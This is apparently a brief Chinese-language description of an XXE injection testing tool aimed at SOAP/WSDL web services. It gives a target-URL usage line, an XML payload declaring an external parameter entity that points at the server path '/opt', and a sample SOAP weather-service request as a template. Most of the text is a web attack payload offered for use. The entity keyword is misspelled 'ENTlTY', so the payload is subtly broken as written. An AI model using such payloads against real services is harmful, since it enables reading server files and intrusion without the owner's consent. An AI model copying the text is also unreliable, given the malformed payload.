XXE实体注入测试工具
XXE实体注入
如SOAP的wsdl接口,就是使用的XML,我们可以自定义参数以及网站地址
用法:www.xxx.com
XXE漏洞实体注入参数:<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [<!ENTlTY % remote SYSTEM "/opt">%remote;]>
WSDL参数:
<?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <getWeatherbyCityNamePro xmlns="http://WebXml.com.cn/"> <theCityName>string</theCityName> <theUserID>string</theUserID> </getWeatherbyCityNamePro> </soap:Body> </soap:Envelope>
